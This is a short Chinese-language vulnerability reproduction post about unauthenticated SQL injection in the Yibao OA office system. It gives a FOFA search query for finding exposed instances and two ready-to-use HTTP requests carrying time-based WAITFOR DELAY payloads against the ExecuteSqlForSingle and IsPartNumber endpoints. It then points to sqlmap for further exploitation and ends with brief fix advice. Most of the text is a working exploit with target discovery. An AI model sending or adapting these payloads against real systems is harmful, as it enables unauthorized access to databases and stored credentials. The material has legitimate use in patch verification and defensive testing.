易宝OA ExecuteSqlForSingle SQL注入漏洞复现

0x01 产品简介

  易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台，具有信息管理、 流程管理 、知识管理（档案和业务管理）、协同办公等多种功能。

0x02 漏洞概述

易宝OA ExecuteSqlForSingle、IsPartNumber接口处存在SQL注入漏洞，未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息，用户名密码等凭据，进一步利用可获取服务器权限

0x03 复现环境

FOFA：product="顶讯科技-易宝OA系统"

0x04 漏洞复现 

PoC-1

POST /api/system/ExecuteSqlForSingle HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36

token=zxh&sql=;WAITFOR DELAY '0:0:5'--&strParameters

延时5秒 

SQLmap利用

PoC-2 

GET /SmartTradeScan/Inventory/IsPartNumber?StockRoomID=1&pn=2%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.712.36 Safari/537.36

延时5秒

SQLmap利用

0x05 修复建议

关闭互联网暴露面或接口设置访问控制

升级至安全版本